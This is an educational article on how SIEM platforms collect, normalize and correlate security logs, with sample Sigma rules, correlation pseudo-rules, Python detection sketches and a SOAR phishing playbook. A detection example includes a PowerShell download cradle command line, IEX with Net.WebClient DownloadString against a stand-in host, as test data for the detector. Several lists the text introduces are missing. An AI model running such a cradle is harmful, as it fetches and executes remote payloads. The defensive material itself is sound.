How SIEM Works: Security Information and Event Management

SIEM (Security Information and Event Management) is a centralized platform that collects, normalizes, correlates, and analyzes security event data from across an organization's entire IT infrastructure -- firewalls, IDS/IPS sensors, servers, endpoints, applications, cloud services, identity providers, and network devices. A SIEM transforms millions of individual log entries and alerts into actionable intelligence by correlating events across sources and time, detecting patterns that no single data source could reveal on its own.

The term SIEM was coined by Gartner in 2005, combining two earlier concepts: SIM (Security Information Management, focused on log collection and retention) and SEM (Security Event Management, focused on real-time analysis and alerting). Modern SIEMs have evolved far beyond simple log aggregation. They incorporate user and entity behavior analytics (UEBA), threat intelligence integration, automated response playbooks (SOAR), and, increasingly, cloud-native architectures that can process petabytes of security telemetry.

This article covers the core architecture of SIEM systems: how logs are collected and normalized, how correlation rules detect threats, how threat intelligence enriches detections, how SOAR automates response, and the practical considerations of deploying and operating a SIEM at scale.

The Problem SIEM Solves

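A mid-sized organization might generate security events from dozens of sources, such as firewalls, IDS/IPS sensors, endpoints, DNS and DHCP servers, cloud platforms, and directory services.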

Without a SIEM, a security analyst would need to log into each of these systems individually, manually correlate timestamps and IP addresses across different log formats, and somehow identify the needle-in-a-haystack pattern that indicates a real attack among millions of benign events. A SIEM automates this process.

Architecture Overview

[Figure: SIEM architecture. Log sources (firewalls, IDS/IPS, endpoints/EDR, DNS/DHCP, cloud such as AWS/GCP, authentication via AD/LDAP) feed a collection layer (syslog receiver, API pollers, agent forwarders), followed by normalization (parsing into a common schema such as ECS or CIM) and tiered storage (hot: SSD index, 30-90 days; warm: HDD, 6-12 months; cold: object store, 1-7 years). Detection and correlation (correlation rules, Sigma/YARA detection, threat intel matching, behavioral UEBA, statistical anomaly detection, threshold alerts, scheduled queries, ML models) draws on threat intelligence feeds (IOCs, IP reputation, malware hashes) and drives response and action (dashboard, alert/ticket, SOAR playbook, auto-block, forensic report). Typical volume: 10K to 500K+ EPS.]

Log Collection and Transport

The first challenge in building a SIEM is getting log data from source systems to the SIEM platform. There are several transport mechanisms, each with different trade-offs:

Syslog (RFC 5424)

Syslog is the oldest and most universal log transport protocol. It originally ran over UDP on port 514 (the BSD behavior documented in RFC 3164); modern deployments use TCP with TLS encryption (RFC 5425) for reliable, secure transport. Nearly every network device, Linux server, and security appliance can export logs via syslog.

Syslog messages have a standardized header containing priority (facility + severity), timestamp, hostname, and application name, followed by the message body. The message body format, however, is vendor-specific -- a Cisco ASA firewall, a Palo Alto NGFW, and a Linux auditd daemon all produce wildly different syslog message formats that must be parsed individually.

<134>1 2025-03-15T14:22:33.042Z fw-border-01 ASA 12345 - - %ASA-6-302013: Built inbound TCP connection 4521032 for outside:198.51.100.42/54321 (198.51.100.42/54321) to inside:10.0.1.50/443 (203.0.113.10/443)
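The header fields described above can be pulled apart with a short parser. This is a minimal sketch, not a full RFC 5424 implementation: the function name `parse_syslog` and the output keys are illustrative, and structured data other than the nil value `-` is left unparsed.

```python
import re

# RFC 5424 header: <PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID,
# followed by structured data and the free-form message.
HEADER = re.compile(
    r"<(?P<pri>\d{1,3})>(?P<version>\d{1,2}) (?P<timestamp>\S+) "
    r"(?P<hostname>\S+) (?P<app>\S+) (?P<procid>\S+) (?P<msgid>\S+) "
    r"(?P<rest>.*)",
    re.DOTALL,
)

SEVERITIES = ["emergency", "alert", "critical", "error",
              "warning", "notice", "informational", "debug"]


def parse_syslog(line: str) -> dict:
    """Split one syslog line into header fields and message body."""
    match = HEADER.match(line)
    if match is None:
        raise ValueError("not an RFC 5424 style line")
    fields = match.groupdict()
    # The priority value encodes facility * 8 + severity.
    pri = int(fields.pop("pri"))
    fields["facility"] = pri // 8
    fields["severity"] = SEVERITIES[pri % 8]
    rest = fields.pop("rest")
    # Simplification: only the nil structured-data value "-" is stripped;
    # anything else is kept as part of the message.
    fields["message"] = rest[2:] if rest.startswith("- ") else rest
    return fields


sample = ("<134>1 2025-03-15T14:22:33.042Z fw-border-01 ASA 12345 - - "
          "%ASA-6-302013: Built inbound TCP connection 4521032 for "
          "outside:198.51.100.42/54321 (198.51.100.42/54321) to "
          "inside:10.0.1.50/443 (203.0.113.10/443)")
event = parse_syslog(sample)
print(event["hostname"], event["facility"], event["severity"])
```

For the sample line, priority 134 decodes to facility 16 (local0) and severity 6 (informational). The vendor-specific body after `%ASA-6-302013:` would still need its own parser.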

Agent-Based Collection

Lightweight agents installed on endpoints forward logs to the SIEM. Common agents include:

Agents provide advantages over raw syslog: reliable delivery with buffering and retry, structured parsing at the source, encryption in transit, and the ability to collect data that syslog does not carry natively (binary files, Windows Event Log entries, container logs).
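The buffering-and-retry behavior can be sketched as a small in-memory queue. This is an illustration of the idea only, not how any particular agent is implemented: `BufferedForwarder`, its parameters, and the injected `send` callable are all hypothetical, and real agents typically also spool to disk.

```python
import time
from collections import deque


class BufferedForwarder:
    """Hold events locally and retry delivery with exponential backoff."""

    def __init__(self, send, max_buffer=10_000, max_retries=3,
                 base_delay=0.5, sleep=time.sleep):
        self._send = send                        # callable that ships one event
        self._buffer = deque(maxlen=max_buffer)  # oldest events drop when full
        self._max_retries = max_retries
        self._base_delay = base_delay
        self._sleep = sleep

    def enqueue(self, event) -> None:
        self._buffer.append(event)

    def pending(self) -> int:
        return len(self._buffer)

    def flush(self) -> int:
        """Try to deliver buffered events in order; return how many were sent."""
        sent = 0
        while self._buffer:
            event = self._buffer[0]
            for attempt in range(self._max_retries):
                try:
                    self._send(event)
                    break
                except ConnectionError:
                    # Back off before the next attempt: 0.5s, 1s, 2s, ...
                    self._sleep(self._base_delay * 2 ** attempt)
            else:
                # Every attempt failed: keep the event buffered for later.
                return sent
            self._buffer.popleft()
            sent += 1
        return sent
```

An event leaves the buffer only after `send` returns without raising, so a collector outage delays delivery rather than losing data, up to the buffer limit.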

API-Based Collection

Cloud services and SaaS applications typically expose logs through REST APIs rather than syslog. The SIEM polls these APIs on a schedule (or receives webhooks) to ingest cloud security data:

Log Normalization and Enrichment

Raw logs from different sources use different field names, formats, timestamps, and conventions. A firewall might log source IPs as src, source_address, or SrcAddr. Timestamps might be Unix epochs, ISO 8601, or vendor-specific formats. Without normalization, writing correlation rules that span multiple data sources would require listing every possible field name variation.
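As a rough illustration of the field-name and timestamp problem, the sketch below maps a few vendor spellings onto one set of names and converts timestamps to UTC ISO 8601. The alias table, the timestamp field names, and the flat dotted keys (`source.ip`, `@timestamp`) are assumptions made for this example; a real pipeline would use a full schema definition.

```python
from datetime import datetime, timezone

# Hypothetical alias table: vendor field name -> common field name.
FIELD_ALIASES = {
    "src": "source.ip",
    "source_address": "source.ip",
    "SrcAddr": "source.ip",
    "dst": "destination.ip",
    "dest_address": "destination.ip",
    "DstAddr": "destination.ip",
}
TIMESTAMP_FIELDS = ("timestamp", "time", "ts")


def to_utc_iso(value) -> str:
    """Accept a Unix epoch or an ISO 8601 string; return UTC ISO 8601."""
    if isinstance(value, (int, float)):
        parsed = datetime.fromtimestamp(value, tz=timezone.utc)
    else:
        parsed = datetime.fromisoformat(str(value).replace("Z", "+00:00"))
        if parsed.tzinfo is None:
            # Assumption: timestamps without an offset are already UTC.
            parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed.astimezone(timezone.utc).isoformat()


def normalize(raw: dict) -> dict:
    """Rename known fields and standardize the timestamp; keep the rest."""
    event = {}
    for key, value in raw.items():
        if key in TIMESTAMP_FIELDS:
            event["@timestamp"] = to_utc_iso(value)
        else:
            event[FIELD_ALIASES.get(key, key)] = value
    return event


print(normalize({"SrcAddr": "10.0.1.50", "time": "2025-03-15T14:22:33Z"}))
print(normalize({"src": "198.51.100.42", "ts": 0}))
```

Once every source is mapped this way, a rule can refer to `source.ip` once instead of listing each vendor's spelling.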

Normalization maps raw log fields to a common schema. The two most widely used schemas are Elastic Common Schema (ECS) and Splunk's Common Information Model (CIM).

Enrichment adds context to normalized events:

Correlation Rules

Correlation rules are the intelligence of a SIEM. They define patterns of events across multiple sources and time windows that indicate security threats. A well-designed correlation rule transforms millions of individual log entries into a handful of high-confidence alerts.

Rule Types

Sigma Rules: Vendor-Neutral Detection

Sigma is an open-source, vendor-neutral detection rule format for SIEM systems. Sigma rules are written in YAML and can be automatically converted to the query language of any supported SIEM (Splunk SPL, Elasticsearch Lucene or EQL queries, QRadar AQL, Microsoft Sentinel KQL, etc.). This allows the security community to share detection logic without being locked into a specific SIEM vendor.

A Sigma rule detecting suspicious PowerShell execution:

title: Suspicious PowerShell Download Cradle
id: a3f9c5d7-b298-4c13-b4c6-d8f94e39a1b7
status: stable
description: Detects PowerShell commands commonly used to download and execute malicious payloads
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains|all:
      - 'Net.WebClient'
      - 'DownloadString'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1105

The community maintains thousands of Sigma rules covering MITRE ATT&CK techniques, organized by tactic and platform. Sigma has become the de facto standard for sharing SIEM detection content.
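To make the matching semantics concrete, here is a small sketch of how a selection with `endswith` and `contains|all` modifiers could be evaluated against one event. It is not the Sigma toolchain, which converts rules into SIEM queries rather than evaluating them in Python; the function names are hypothetical, only these modifiers are handled, and the sample selection uses `Image` for the process's own executable path.

```python
def field_matches(value: str, modifiers: list, patterns) -> bool:
    """Evaluate one 'Field|modifier|...' entry against an event value."""
    if not isinstance(patterns, list):
        patterns = [patterns]
    value = value.lower()  # Sigma string matching is case-insensitive by default
    if "endswith" in modifiers:
        results = [value.endswith(p.lower()) for p in patterns]
    elif "contains" in modifiers:
        results = [p.lower() in value for p in patterns]
    else:
        results = [value == p.lower() for p in patterns]
    # 'all' requires every pattern to match; otherwise any one is enough.
    return all(results) if "all" in modifiers else any(results)


def selection_matches(selection: dict, event: dict) -> bool:
    """Every entry in the selection must match (logical AND)."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if field not in event:
            return False
        if not field_matches(str(event[field]), modifiers, patterns):
            return False
    return True


selection = {
    "Image|endswith": "\\powershell.exe",
    "CommandLine|contains|all": ["Net.WebClient", "DownloadString"],
}
event = {
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": "powershell -c IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://example.test/a')",
}
print(selection_matches(selection, event))
```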

Example Correlation Scenarios

Credential Stuffing Detection:

-- Pseudo-rule: multiple accounts failing auth from one IP
WHEN count(failed_auth events
  WHERE source.ip = X
  AND event.outcome = "failure"
  GROUP BY source.ip
  WITHIN 10 minutes) > 50
AND distinct_count(user.name) > 10
THEN alert "Credential Stuffing" severity HIGH
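The pseudo-rule above can be sketched as a per-IP sliding window. This is one possible shape under stated assumptions: events arrive in time order, timestamps are epoch seconds, and the class and parameter names are invented for the example.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 600       # 10 minutes
MAX_FAILURES = 50
MAX_DISTINCT_USERS = 10


class CredentialStuffingDetector:
    def __init__(self):
        # source IP -> deque of (timestamp, user name) for recent failures
        self._failures = defaultdict(deque)

    def observe(self, ts: float, source_ip: str, user: str, outcome: str) -> bool:
        """Feed one auth event; return True when the rule condition holds."""
        if outcome != "failure":
            return False
        window = self._failures[source_ip]
        window.append((ts, user))
        # Drop failures that have aged out of the 10-minute window.
        while window and window[0][0] <= ts - WINDOW_SECONDS:
            window.popleft()
        distinct_users = {name for _, name in window}
        return (len(window) > MAX_FAILURES
                and len(distinct_users) > MAX_DISTINCT_USERS)
```

Requiring many distinct user names separates credential stuffing from a single user repeatedly mistyping a password, which would trip a pure failure-count threshold.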

Lateral Movement Detection:

-- Sequence: compromised host scanning then connecting internally
WHEN event_A = (IDS alert "Network Scan" from host X)
FOLLOWED BY event_B = (
  auth_success from host X to host Y
  WHERE X != Y
  AND both are in $HOME_NET
  WITHIN 30 minutes of event_A
)
FOLLOWED BY event_C = (
  process_creation on host Y
  WHERE process.name in ("psexec.exe", "wmic.exe", "cmd.exe")
  WITHIN 15 minutes of event_B
)
THEN alert "Probable Lateral Movement" severity CRITICAL
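A sequence rule like this needs state carried between events. The sketch below tracks that state in two dictionaries; the event shape (`type`, `ts`, `host`, `src`, `dst`, `process`) and the function name are assumptions for illustration, and events are expected in time order.

```python
LATERAL_TOOLS = {"psexec.exe", "wmic.exe", "cmd.exe"}
SCAN_TO_AUTH = 30 * 60   # seconds allowed between scan alert and login
AUTH_TO_EXEC = 15 * 60   # seconds allowed between login and process start


def find_lateral_movement(events, home_net):
    """Return (source host, target host) pairs matching the three-step sequence."""
    scans = {}    # host X -> time of its most recent scan alert
    logins = {}   # host Y -> (host X, time X logged in to Y after scanning)
    alerts = []
    for e in events:
        ts, kind = e["ts"], e["type"]
        if kind == "ids_scan":
            scans[e["host"]] = ts
        elif kind == "auth_success":
            src, dst = e["src"], e["dst"]
            if (src != dst and src in home_net and dst in home_net
                    and src in scans and ts - scans[src] <= SCAN_TO_AUTH):
                logins[dst] = (src, ts)
        elif kind == "process_creation":
            host = e["host"]
            if (host in logins
                    and e["process"].lower() in LATERAL_TOOLS
                    and ts - logins[host][1] <= AUTH_TO_EXEC):
                alerts.append((logins[host][0], host))
    return alerts


events = [
    {"type": "ids_scan", "ts": 0, "host": "10.0.1.50"},
    {"type": "auth_success", "ts": 600, "src": "10.0.1.50", "dst": "10.0.1.60"},
    {"type": "process_creation", "ts": 900, "host": "10.0.1.60",
     "process": "PsExec.exe"},
]
print(find_lateral_movement(events, {"10.0.1.50", "10.0.1.60"}))
```

Each step on its own is common and usually benign; the alert comes only from seeing all three in order within the time limits.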

Data Exfiltration Detection:

-- Aggregation: unusual outbound data volume
WHEN sum(network.bytes_out
  WHERE source.ip IN $INTERNAL_SERVERS
  AND destination.ip NOT IN $KNOWN_BACKUP_DESTINATIONS
  GROUP BY source.ip
  WITHIN 1 hour) > 5GB
AND time_of_day NOT IN (scheduled_backup_window)
THEN alert "Possible Data Exfiltration" severity HIGH
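The aggregation can be approximated with per-hour buckets. This sketch simplifies the pseudo-rule in two ways that should be read as assumptions: it uses fixed one-hour buckets instead of a sliding window, and it treats 5GB as 5 GiB. The flow record shape and the function name are hypothetical.

```python
from collections import defaultdict

THRESHOLD_BYTES = 5 * 1024**3   # 5 GiB
WINDOW_SECONDS = 3600


def exfil_suspects(flows, internal_servers, backup_destinations,
                   backup_hours=frozenset()):
    """Return sorted source IPs whose outbound volume exceeds the threshold.

    flows: iterable of dicts with ts (epoch seconds), src, dst, bytes_out.
    backup_hours: UTC hours of day (0-23) covered by scheduled backups.
    """
    totals = defaultdict(int)   # (source IP, hour bucket) -> bytes sent
    for flow in flows:
        if flow["src"] not in internal_servers:
            continue
        if flow["dst"] in backup_destinations:
            continue
        bucket = int(flow["ts"]) // WINDOW_SECONDS
        if bucket % 24 in backup_hours:
            continue
        totals[(flow["src"], bucket)] += flow["bytes_out"]
    return sorted({src for (src, _), total in totals.items()
                   if total > THRESHOLD_BYTES})
```

A fixed threshold is a blunt instrument; comparing each server against its own historical baseline is a common refinement.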

Threat Intelligence Integration

Threat intelligence feeds provide lists of known-malicious indicators of compromise (IOCs) that the SIEM matches against incoming events in real time. IOC types include:

Threat intelligence is consumed via standardized protocols:

Common threat intelligence sources include commercial feeds (Recorded Future, CrowdStrike, Mandiant), open-source feeds (Abuse.ch, AlienVault OTX, PhishTank), and industry-specific sharing communities (FS-ISAC for financial services, H-ISAC for healthcare).
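At its simplest, IOC matching is a set lookup against fields of each normalized event. The sketch below assumes indicators have already been loaded from a feed into memory; the indicator values are placeholders from documentation ranges, and the event field names follow ECS-style naming as an assumption.

```python
import ipaddress

# Hypothetical indicators; in practice these come from a feed and expire.
IOC_IPS = {ipaddress.ip_address("198.51.100.42")}
IOC_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]
IOC_DOMAINS = {"malicious.example"}
IOC_SHA256 = {"0" * 64}


def match_iocs(event: dict) -> list:
    """Return (field, value) pairs in the event that match a known indicator."""
    hits = []
    for field in ("source.ip", "destination.ip"):
        raw = event.get(field)
        if raw is None:
            continue
        addr = ipaddress.ip_address(raw)
        if addr in IOC_IPS or any(addr in net for net in IOC_NETWORKS):
            hits.append((field, raw))
    # Match the listed domain itself or any subdomain of it.
    domain = event.get("dns.question.name", "").lower().rstrip(".")
    if any(domain == d or domain.endswith("." + d) for d in IOC_DOMAINS):
        hits.append(("dns.question.name", domain))
    sha256 = event.get("file.hash.sha256", "").lower()
    if sha256 in IOC_SHA256:
        hits.append(("file.hash.sha256", sha256))
    return hits


print(match_iocs({"source.ip": "198.51.100.42", "destination.ip": "10.0.1.50"}))
```

Hash and exact-IP lookups are constant-time set membership tests, which is what makes matching feasible at high event rates; the linear scan over networks would need a prefix tree for large feeds.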

SOAR: Security Orchestration, Automation, and Response

SOAR extends the SIEM from detection to response. While a SIEM tells you "something bad is happening," SOAR defines what to do about it through automated playbooks. Modern SIEMs increasingly integrate SOAR capabilities natively (Splunk SOAR, Microsoft Sentinel Playbooks, Elastic Security response actions).

Playbook Architecture

A SOAR playbook is a sequence of automated actions triggered by a SIEM alert. Playbooks typically follow a pattern:

  1. Triage -- enrich the alert with additional context (query threat intel, look up asset criticality, check recent login history for the affected user).
  2. Evaluate -- apply logic to determine if the alert is a true positive or likely false positive. If the affected asset is a honeypot, escalate immediately. If the source IP is a known scanner, lower severity.
  3. Contain -- take automated containment actions: block the malicious IP on the firewall, isolate the affected endpoint from the network, disable the compromised user account, quarantine a malicious email across all mailboxes.
  4. Notify -- create a ticket in the incident management system, send Slack/PagerDuty notifications to the on-call analyst, escalate to the incident response team if severity warrants it.
  5. Document -- record all actions taken, evidence collected, and timeline in a case management system for post-incident review.

Example playbook -- phishing email detected:

  1. SIEM alert: email gateway detected a phishing email delivered to a user.
  2. SOAR queries the email gateway API to retrieve the full email (headers, body, attachments, URLs).
  3. SOAR detonates any attachments in a sandbox and checks URLs against threat intelligence.
  4. If confirmed malicious: SOAR searches for the same email across all mailboxes and quarantines all instances.
  5. SOAR checks if the user clicked any URLs in the email (via web proxy logs).
  6. If clicked: SOAR isolates the user's endpoint, resets their password, revokes active sessions, and creates a high-severity incident.
  7. If not clicked: SOAR creates a low-severity ticket for analyst review and sends the user a phishing awareness notification.
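The branching in this playbook can be sketched as plain control flow. The sandbox, threat intel, and proxy-log lookups are passed in as callables, and actions are recorded as strings rather than executed; all names here are hypothetical, and the benign branch is an assumption, since the steps above only describe the confirmed-malicious path.

```python
from dataclasses import dataclass, field


@dataclass
class PhishingCase:
    message_id: str
    recipient: str
    severity: str = "unset"
    actions: list = field(default_factory=list)


def run_phishing_playbook(case, is_malicious, user_clicked):
    """Apply the playbook's decisions and record the actions it would take.

    is_malicious(message_id) stands in for sandbox and threat intel checks;
    user_clicked(recipient, message_id) stands in for a web proxy log search.
    """
    case.actions.append("fetch_email")
    if not is_malicious(case.message_id):
        # Assumption: a benign verdict closes the case with no containment.
        case.severity = "informational"
        case.actions.append("close_as_benign")
        return case
    case.actions.append("quarantine_all_copies")
    if user_clicked(case.recipient, case.message_id):
        case.severity = "high"
        case.actions += ["isolate_endpoint", "reset_password",
                         "revoke_sessions", "create_incident"]
    else:
        case.severity = "low"
        case.actions += ["create_ticket", "send_awareness_notice"]
    return case


case = run_phishing_playbook(
    PhishingCase("msg-001", "alice@example.test"),
    is_malicious=lambda message_id: True,
    user_clicked=lambda recipient, message_id: False,
)
print(case.severity, case.actions)
```

Keeping the decision logic separate from the integrations makes the playbook testable without touching a live mail gateway or EDR.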

Storage and Retention

SIEM storage is one of the largest operational costs. A mid-sized organization ingesting 50,000 events per second generates approximately 4 TB of raw log data per day, assuming an average event size of about 1 KB. Regulatory requirements often mandate retaining this data for 1-7 years, leading to petabyte-scale storage challenges.
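The arithmetic behind these figures is easy to reproduce. The sketch below assumes an average raw event size of 1,000 bytes, which is an assumption chosen to match the estimate above; real averages vary widely by source, and compression and indexing overhead are ignored.

```python
SECONDS_PER_DAY = 86_400
AVG_EVENT_BYTES = 1_000   # assumption: roughly 1 KB per raw event


def daily_volume_tb(eps: int, avg_event_bytes: int = AVG_EVENT_BYTES) -> float:
    """Raw log volume per day in terabytes (10^12 bytes)."""
    return eps * SECONDS_PER_DAY * avg_event_bytes / 1e12


def retained_volume_pb(eps: int, years: float,
                       avg_event_bytes: int = AVG_EVENT_BYTES) -> float:
    """Raw volume accumulated over a retention period, in petabytes."""
    return daily_volume_tb(eps, avg_event_bytes) * 365 * years / 1000


print(round(daily_volume_tb(50_000), 2))        # TB per day at 50,000 EPS
print(round(retained_volume_pb(50_000, 1), 2))  # PB after one year
print(round(retained_volume_pb(50_000, 7), 2))  # PB after seven years
```

At 50,000 EPS this works out to about 4.3 TB per day, roughly 1.6 PB per year, and about 11 PB over a seven-year retention period before compression.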

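Modern SIEMs use tiered storage architectures: a hot tier on SSD-backed indexes for roughly the most recent 30-90 days, a warm tier on HDD for about 6-12 months, and a cold tier in object storage for 1-7 years.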

Strategies for managing SIEM storage costs include:

SIEM Deployment Architectures

On-Premises SIEM

Traditional SIEMs run entirely on-premises: dedicated hardware for log collection, indexing, storage, and the correlation engine. Splunk Enterprise, IBM QRadar, and the Elastic Stack (self-managed) are common on-premises deployments. Advantages include full data sovereignty and control over infrastructure. Disadvantages include significant capital expenditure, operational overhead, and scalability limitations.

Cloud-Native SIEM

Cloud-native SIEMs run as managed services in the cloud: Microsoft Sentinel (on Azure), Google Chronicle (on Google Cloud), Splunk Cloud, and Elastic Cloud. These platforms offer elastic scalability, reduced operational overhead, and consumption-based pricing. They are particularly well-suited for organizations with significant cloud infrastructure, as log collection from the provider's own cloud services is often built in and needs little configuration.

Hybrid SIEM

Many organizations adopt a hybrid approach: cloud SIEM for cloud workloads, with on-premises log collectors forwarding data from legacy infrastructure. This addresses data sovereignty concerns (keeping certain logs on-premises) while leveraging cloud scalability for storage and analysis.

Measuring SIEM Effectiveness

A SIEM is only as good as its detection coverage, alert quality, and response speed. Key metrics include:

Common SIEM Pitfalls

See It in Action

SIEM platforms ingest data from across the global internet infrastructure, including BGP routing events, IDS/IPS alerts, and WAF logs. Many organizations correlate BGP anomalies (route hijacks, route leaks) with SIEM data to detect sophisticated network-layer attacks. Use the god.ad BGP Looking Glass to explore the networks of major SIEM vendors and the infrastructure that generates the security telemetry these platforms analyze.

Every connection, every DNS query, every authentication event traversing the BGP-routed internet generates data that feeds into SIEM platforms worldwide. Look up any AS number or IP address to see the routing paths these events traverse on their way from source to SIEM.
